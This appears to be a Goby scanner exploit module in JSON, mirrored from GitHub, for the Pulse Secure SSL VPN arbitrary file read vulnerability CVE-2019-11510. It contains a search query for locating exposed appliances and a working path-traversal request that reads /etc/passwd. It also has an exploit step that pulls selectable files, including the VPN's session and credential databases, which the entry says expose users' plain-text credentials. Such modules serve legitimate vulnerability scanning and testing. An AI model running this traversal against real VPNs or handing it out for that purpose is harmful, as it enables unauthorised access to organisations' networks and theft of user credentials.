mirror of https://github.com/qwqdanchun/Goby.git
100 lines
3.6 KiB
JSON
100 lines
3.6 KiB
JSON
{
|
|
"Name": "Pulse Secure SSL VPN Arbitrary File Read (CVE-2019-11510)",
|
|
"Description": "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .",
|
|
"Product": "Pulse Connect Secure",
|
|
"Homepage": "https://www.pulsesecure.net/",
|
|
"DisclosureDate": "2019-05-08",
|
|
"Author": "itardc@163.com",
|
|
"FofaQuery": "app=\"PulseSecure-SSL-VPN\" || (title==\"Pulse Connect Secure\" && body=\"welcome.cgi?p=logo&signinid=url_default\" && body=\"/dana-na/imgs/space.gif\")",
|
|
"GobyQuery": "",
|
|
"Level": "3",
|
|
"Impact": "The attacker may be able to gain access to all active users and their plain-text credentials.",
|
|
"Recommendation": "Updates are available from Pulse Secure Advisory.",
|
|
"References": [
|
|
"http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html",
|
|
"http://packetstormsecurity.com/files/154231/Pulse-Secure-SSL-VPN-File-Disclosure-NSE.html",
|
|
"http://www.securityfocus.com/bid/108073",
|
|
"https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/",
|
|
"https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/",
|
|
"https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf",
|
|
"https://kb.pulsesecure.net/?atype=sa",
|
|
"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/",
|
|
"https://lists.apache.org/thread.html/ff5fa1837b6bd1b24d18a42faa75e165a4573dbe2d434910c15fd08a@%3Cuser.guacamole.apache.org%3E",
|
|
"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0010",
|
|
"https://www.kb.cert.org/vuls/id/927237",
|
|
"https://nvd.nist.gov/vuln/detail/CVE-2019-11510",
|
|
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": [
|
|
{
|
|
"name": "file",
|
|
"type": "createSelect",
|
|
"value": "/etc/passwd,/etc/hosts,/data/runtime/mtmp/lmdb/dataa/data.mdb,/data/runtime/mtmp/system,/data/runtime/mtmp/lmdb/randomVal/data.mdb",
|
|
"show": ""
|
|
}
|
|
],
|
|
"ExpTips": {
|
|
"Type": "",
|
|
"Content": ""
|
|
},
|
|
"ScanSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"data": "",
|
|
"data_type": "text",
|
|
"follow_redirect": true,
|
|
"method": "GET",
|
|
"uri": "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
|
|
},
|
|
"ResponseTest": {
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"bz": "",
|
|
"operation": "contains",
|
|
"type": "item",
|
|
"value": "root:x",
|
|
"variable": "$body"
|
|
}
|
|
],
|
|
"operation": "AND",
|
|
"type": "group"
|
|
}
|
|
}
|
|
],
|
|
"ExploitSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"data": "",
|
|
"data_type": "text",
|
|
"follow_redirect": true,
|
|
"method": "GET",
|
|
"uri": "/dana-na/../dana/html5acc/guacamole/../../../../../../..{{{file}}}?/dana/html5acc/guacamole/"
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody"
|
|
]
|
|
}
|
|
],
|
|
"Tags": ["fileread"],
|
|
"CVEIDs": [
|
|
"CVE-2019-11510"
|
|
],
|
|
"CVSSScore": "10.0",
|
|
"AttackSurfaces": {
|
|
"Application": null,
|
|
"Support": null,
|
|
"Service": null,
|
|
"System": null,
|
|
"Hardware": ["PulseSecure-SSL-VPN"]
|
|
}
|
|
} |